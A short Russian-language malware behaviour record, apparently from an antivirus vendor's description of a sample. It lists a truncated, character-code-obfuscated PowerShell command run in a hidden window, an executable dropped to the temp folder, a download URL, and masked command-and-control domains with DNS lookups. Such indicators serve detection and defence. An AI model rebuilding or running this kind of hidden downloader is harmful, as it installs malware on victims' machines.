Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StrINg]::JOiN('', (( 110, 24 , 40 , 30 ,119 ,36, 47 , 61 ,103 , 37, 40 ,32, 47 ,41, 62,106 ,4 ,47 , 62 ,100 , 29,47 ,40, 9, 38,35 , 47 , 36, 62,113 ,110 , 34, 19 ,48,119 ,109, 34 ,62 , 62, 58 ...
- %TEMP%\122.exe
- %TEMP%\122.exe
- 'da####sellers.com':80
- 'pc####-aeronet.hu':80
- http://da####sellers.com/6pEhRZwv/
- http://www.da####sellers.com/6pEhRZwv
- DNS ASK da####sellers.com
- DNS ASK 18####stohappy.com
- DNS ASK xn#####-jk4buiz50r.com
- DNS ASK sy###germei.xyz
- DNS ASK pc####-aeronet.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StrINg]::JOiN('', (( 110, 24 , 40 , 30 ,119 ,36, 47 , 61 ,103 , 37, 40 ,32, 47 ,41, 62,106 ,4 ,47 , 62 ,100 , 29,47 ,40, 9, 38,35 , 47 , 36, 62,113 ,110 , 34, 19 ,48,119 ,109, 34 ,62 , 62, 58 ...' (со скрытым окном)